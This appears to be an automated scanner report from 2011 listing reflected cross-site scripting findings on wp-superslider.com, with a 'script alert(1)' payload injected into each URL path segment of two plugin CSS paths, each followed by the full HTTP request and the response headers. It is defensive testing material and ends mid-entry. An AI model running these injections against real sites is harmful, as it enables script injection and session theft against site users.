This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site82727"><script>alert(1)</script>61afe33f333/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8345f"><script>alert(1)</script>a5d18f0e20a was submitted in the REST URL parameter 2. This input was echoed as 8345f\"><script>alert(1)</script>a5d18f0e20a in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content8345f"><script>alert(1)</script>a5d18f0e20a/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:24 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674544+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674544; expires=Thu, 02-Feb-2012 19:22:24 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:24 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2b6e4"><script>alert(1)</script>1a8376b51b was submitted in the REST URL parameter 3. This input was echoed as 2b6e4\"><script>alert(1)</script>1a8376b51b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins2b6e4"><script>alert(1)</script>1a8376b51b/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:25 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53458
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c8dbd"><script>alert(1)</script>faa582e2f65 was submitted in the REST URL parameter 4. This input was echoed as c8dbd\"><script>alert(1)</script>faa582e2f65 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerptc8dbd"><script>alert(1)</script>faa582e2f65/plugin-data/superslider/ssExcerpt/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:26 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 367a3"><script>alert(1)</script>72b3425ad17 was submitted in the REST URL parameter 5. This input was echoed as 367a3\"><script>alert(1)</script>72b3425ad17 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data367a3"><script>alert(1)</script>72b3425ad17/superslider/ssExcerpt/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:28 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51aa1"><script>alert(1)</script>6001cc5eecf was submitted in the REST URL parameter 6. This input was echoed as 51aa1\"><script>alert(1)</script>6001cc5eecf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider51aa1"><script>alert(1)</script>6001cc5eecf/ssExcerpt/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:30 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674551+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674551; expires=Thu, 02-Feb-2012 19:22:31 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:31 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53460
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 116ab"><script>alert(1)</script>ee2c400a80f was submitted in the REST URL parameter 7. This input was echoed as 116ab\"><script>alert(1)</script>ee2c400a80f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt116ab"><script>alert(1)</script>ee2c400a80f/default/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:32 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674552+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674553; expires=Thu, 02-Feb-2012 19:22:33 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:33 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53462
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 8 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5882b"><script>alert(1)</script>8f70873ebba was submitted in the REST URL parameter 8. This input was echoed as 5882b\"><script>alert(1)</script>8f70873ebba in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default5882b"><script>alert(1)</script>8f70873ebba/default.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:34 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674554+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674554; expires=Thu, 02-Feb-2012 19:22:34 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:34 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 9 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 44970"><script>alert(1)</script>402867fa415 was submitted in the REST URL parameter 9. This input was echoed as 44970\"><script>alert(1)</script>402867fa415 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-excerpt/plugin-data/superslider/ssExcerpt/default/default.css44970"><script>alert(1)</script>402867fa415 HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:37 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674557+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674557; expires=Thu, 02-Feb-2012 19:22:37 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:37 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53461
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 75bf0"><script>alert(1)</script>d53f8f09d5f was submitted in the REST URL parameter 1. This input was echoed as 75bf0\"><script>alert(1)</script>d53f8f09d5f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site75bf0"><script>alert(1)</script>d53f8f09d5f/wp-content/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:22 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674542+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674542; expires=Thu, 02-Feb-2012 19:22:22 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:22 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31761"><script>alert(1)</script>9a2ec4ef367 was submitted in the REST URL parameter 2. This input was echoed as 31761\"><script>alert(1)</script>9a2ec4ef367 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content31761"><script>alert(1)</script>9a2ec4ef367/plugins/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:23 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674543+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674543; expires=Thu, 02-Feb-2012 19:22:23 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:23 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 214f6"><script>alert(1)</script>21d72fb4419 was submitted in the REST URL parameter 3. This input was echoed as 214f6\"><script>alert(1)</script>21d72fb4419 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins214f6"><script>alert(1)</script>21d72fb4419/superslider-login/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:24 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674545+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674545; expires=Thu, 02-Feb-2012 19:22:25 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:25 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7c380"><script>alert(1)</script>942fd5177a7 was submitted in the REST URL parameter 4. This input was echoed as 7c380\"><script>alert(1)</script>942fd5177a7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login7c380"><script>alert(1)</script>942fd5177a7/plugin-data/superslider/ssLogin/default/default_horizontal.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:26 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674547+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674547; expires=Thu, 02-Feb-2012 19:22:27 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:27 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 53af1"><script>alert(1)</script>8d9b584a4b9 was submitted in the REST URL parameter 5. This input was echoed as 53af1\"><script>alert(1)</script>8d9b584a4b9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data53af1"><script>alert(1)</script>8d9b584a4b9/superslider/ssLogin/default/default_horizontal.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
HTTP/1.1 404 Not Found Date: Wed, 02 Feb 2011 19:22:28 GMT Server: Apache/2.2.14 (Unix) mod_ssl/2.2.14 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4 X-Powered-By: PHP/5.2.12 X-Pingback: http://wp-superslider.com/site/xmlrpc.php Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Pragma: no-cache Set-Cookie: bb2_screener_=1296674548+173.193.214.243; path=/ Set-Cookie: wpgb_visit_last_php-default=1296674549; expires=Thu, 02-Feb-2012 19:22:29 GMT; path=/ Last-Modified: Wed, 02 Feb 2011 19:22:29 GMT Connection: close Content-Type: text/html; charset=UTF-8 Content-Length: 53482
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en-US">
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d94d5"><script>alert(1)</script>8937e1e9ddf was submitted in the REST URL parameter 6. This input was echoed as d94d5\"><script>alert(1)</script>8937e1e9ddf in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /site/wp-content/plugins/superslider-login/plugin-data/supersliderd94d5"><script>alert(1)</script>8937e1e9ddf/ssLogin/default/default_horizontal.css HTTP/1.1 Host: wp-superslider.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: wpgb_visit_last-http://burp=Wed%20Feb%2002%202011%2009%3A46%3A33%20GMT-0600%20%28Central%20Standard%20Time%29; wpgb_visit_last_php-default=1296661497; __utmz=128106954.1296661566.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/14; bb2_screener_=1296661541+173.193.214.243; __utma=128106954.628123047.1296661566.1296661566.1296661566.1; __utmc=128106954; __utmb=128106954.1.10.1296661566;
Response
